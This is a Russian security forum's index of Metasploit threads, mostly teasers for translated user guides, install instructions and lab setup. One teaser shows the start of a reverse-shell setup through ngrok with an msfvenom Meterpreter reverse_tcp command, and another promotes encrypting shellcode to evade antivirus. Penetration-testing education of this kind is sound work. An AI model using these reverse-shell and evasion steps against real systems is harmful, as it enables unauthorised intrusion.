Metasploit Framework

  • Последние ответы
  • Новые темы
  • Lotus
  • English

Soft Kage - графический метасплоит.

  • 1 814
  • 4
Приветствую читателей codeby.net! Сегодня хотелось бы обратить внимание на один интересный проект, созданный для облегчения пользования Metasploit, а именно сеансами meterpreter и не только. И так, "Kage" - инструмент, представляющий собой графический интерфейс пользователя для "Metasploit meterpreter" и обработчика сеансов. Основной принцип его работы это "минимум кода - максимум графики". Перейдем к подробному ознакомлению. Для начала у нас должен быть предустановлен сам "Metasploit Framework" (Msfrpcd, Msfvenom, Msfdb). После приступаем к установке "Kage". Дальше два варианта...

Статья Meterpreter снова в деле: 100% FUD with Metasploit 5

  • 16 187
  • 75
Введение Доброго времени суток друзья! Рад снова вас видеть! Написать эту статью я намеревался еще до официального релиза Metasploit 5, но вечно не хватающее время и некоторые другие обстоятельства не позволили этому сбыться. Сегодня речь пойдет как вы уже могли понять из заголовка - об обходе антивируса. С Metasploit 5 у нас появилась возможность "из коробки" шифровать shellcode с помощью AES-256. Таким образом наш shellcode становится абсолютно не читаемым для антивирусов. Конечно можно было бы ограничиться ссылкой на github или на официальное видео в youtube, но мне захотелось пойти...

Статья Metasploit Framework 5.0 - Мажорный релиз

  • 1 958
  • 4
Metasploit Framework 5.0 - Мажорный релиз Всех приветствую! На форуме осталось без внимания одно важное событие, а именно выход мажорной версии Metasploit Framework 5.0. А ведь последний раз выпуск мажорной версии всем известного фреймворка был в 2011 году. В этот релиз попало довольно много интересных фич и я постараюсь осветить основные из них. API для автоматизации В данном релизе Metasploit пошел по пути налаживания взаимодействия с внешними сервисами и инструментами. Теперь доступна возможность запуска СУБД как службы через REST интерфейс, что позволит использовать несколько...

Статья [Metasploit] устанавливаем обратное TCP соединение через ngrok

  • 5 482
  • 27
Подготовка выполнена, переходим к реализации задуманного. Шаг 1 - Запускаем Ngrok Запускаем ngrok: ./ngrok tcp 4444 После запуска ngrok, вы увидете что то похожое на tcp://0.tcp.ngrok.io:13286 -> localhost:4444 Это означает что весь трафик который будет идти на 0.tcp.ngrok.io через порт 13286 будет перенаправляться к нам в машину на порт 4444. Не закрываем терминал и переходим к следующему шагу. Шаг 2 - Создаем пользовательскую нагрузку Запустим другой терминал и создадим пользовательскую нагрузку с вышеупомянутым хостом и портом. msfvenom -p windows/meterpreter/reverse_tcp...​

Soft Metasploit – руководство пользователя

  • 5 171
  • 7
Это неофициальный перевод руководства пользователя Metasploit на русский язык. Перевод может содержать неточности. Оригинал статьи на английском языке находится тут, на официальном сайте правообладателя. Содержание Сравнение версий продукта Начало работы с Metasploit Основные понятия и термины Работа Metasploit Pro Доступ к Metasploit Pro через веб-интерфейс Доступ к Metasploit Pro из командной строки Страница проекта Создание проекта Получение целевых данных Просмотр и управление данными хоста Запуск сканирования уязвимостей Использование известных уязвимостей Постэксплуатация и...

Soft Руководство по установке Metasploit для Linux

  • 2 975
  • 1
Об установщике Metasploit Стандартный установщик Metasploit использует графический интерфейс, чтобы помочь вам в процессе установки. Обычно, это несколько подсказок, которые помогают определить локацию для установки Metasploit и порт, который вы хотите, чтобы Metasploit использовал. Когда начинается инсталляция, установщик инсталлирует зависимости и службы, необходимые для запуска Metasploit. Внимание! Это руководство по установке Metasploit на Linux. Если вы устанавливаете Metasploit на Windows, обратитесь к этой статье: Установка Metasploit на Windows. Минимальные требования * Это...

Soft Metasploit Community — Руководство для начинающих

  • 2 475
  • 0
О руководстве Это руководство предоставляет информацию и инструкции для начала работы с Metasploit Community. Следующие разделы описывают целевую аудиторию, структуру и условные обозначения, которые использованы в этом руководстве. Целевая аудитория Это руководство предназначено для специалистов в области IT и безопасности, которые используют Metasploit Community для тестирования на проникновение. Структура Руководство включает в себя следующие главы: О руководстве; Перед тем как начать; Обзор Metasploit Community; Давайте приступим. Условные обозначения Следующая таблица описывает...

Soft Начало работы с Metasploit

  • 18 750
  • 3
Первое, что нужно сделать. Если вы еще не скачали Metasploit, ознакомьтесь с этой инструкцией. А если Metasploit уже установлен на вашем компьютере, поздравляем! Вы можете начинать работу. О Metasploit Metasploit – это платформа для тестирования, поиска и использования уязвимостей. Она включает фреймворки Metasploit и их коммерческие аналоги: Metasploit Pro, Express, Community и Nexpose Ultimate. Фреймворк Metasploit Metasploit Framework является основой для создания коммерческих продуктов. Это проект с открытым кодом, который обеспечивает инфраструктуру, содержание и инструменты для...

Soft Установка Metasploit на Windows — руководство пользователя

  • 4 888
  • 5
Об установщике Metasploit Стандартный установщик Metasploit использует графический интерфейс, чтобы помочь вам в процессе установки. Обычно, это несколько подсказок, которые помогают определить локацию для установки Metasploit и порт, который вы хотите, чтобы Metasploit использовал. Когда начинается инсталляция, установщик инсталлирует зависимости и службы, необходимые для запуска Metasploit. Минимальные требования Установка Metasploit Найдите файл установщик Windows и дважды щелкните на значке программы установки. Когда появится окно установки, нажмите Next для начала инсталляции...

Soft Настройка уязвимых целей в Metasploit

  • 1 416
  • 0
Настройка уязвимой цели в Metasploit Тестовая среда обеспечивает безопасное место для проведения тестирования на проникновение и исследования в области безопасности. Для ее создания вам нужен Metasploit образец, который может получить доступ к уязвимой цели. В следующих разделах описаны требования и инструкции по настройке уязвимой цели. Загрузка и настройка Metasploitable 2 Самый простой способ получить доступ к целевой машине – использовать Metasploitable 2, (преднамеренно уязвимая виртуальная машина Ubuntu Linux, которая предназначена для тестирования распространенных уязвимостей)...

Soft Сегментация и тестирование фаервола в Metasploit

  • 817
  • 0
Когда фаерволы неправильно настроены, или придерживаются слабой политики исходящего трафика, они открывают сеть к атакам со стороны обратных оболочек, эксфильтрации данных и других форм эксплуатации. Для того чтобы определить открытые порты, которые разрешают исходящий трафик, и удостоверится, что ваша политика фильтрации исходящего трафика блокирует трафик должным образом, вы можете запустить Метамодуль тестирования фаервола и сегментации. Метамодуль запускает Nmap SYN сканирование против исходящей цели, чтобы выявить исходящие порты, которые открыты с внутреннего хоста. Исходящая цель...

Soft Metasploit — Совместная работа команды

  • 1 121
  • 0
Совместная работа команды Поддержка мульти-пользователей предоставляет вам возможность сотрудничать с другими членами команды. Вы и ваша команда можете использовать один и тот же экземпляр Metasploit Pro для выполнения задач, просмотра данных, а также обмена проектами. Вы можете получить доступ к Metasploit Metasploit Pro через веб-интерфейс, который работает на локальной машине или в сети. Некоторые функции, которые вы можете реализовать для улучшения взаимодействия в команде – это ограничения сети, теги хоста и комментарии хоста. Эти функции позволяют создавать отдельные рабочие нагрузки...

Наши курсы

Информационная безопасность

Защита информации

Команда онлайн

  • Jumuro®
    Jumuro®
    Member

Пользователи онлайн

  • colby
  • SearcherSlava
  • Артур Мироненко
  • D4ckD4ck
  • PennStation
  • Radll
  • S7sss
  • GOGALOXBLYAT
  • ProstoPoc
  • supermail
  • Иван Россихин
  • ThePsyFamily
  • pd-7
  • tuefactory
  • IlaiTomson
  • lilDuck
  • vira
  • Lubos Tomasko
  • qwerty1337
  • Iveh3ve
  • vollod
  • Shuhart
  • Lebunrte
  • andto
  • Dalekiy
  • gedinra
  • Fasneks
  • kv5
  • джон
  • Feniciline
  • pr0xy-s3rv3r
  • Gadget
  • Lor
  • Jumuro®
  • WD40
  • Hainzel
  • tryweryn
  • pijagorda123

Наши книги

Information Security

InfoSec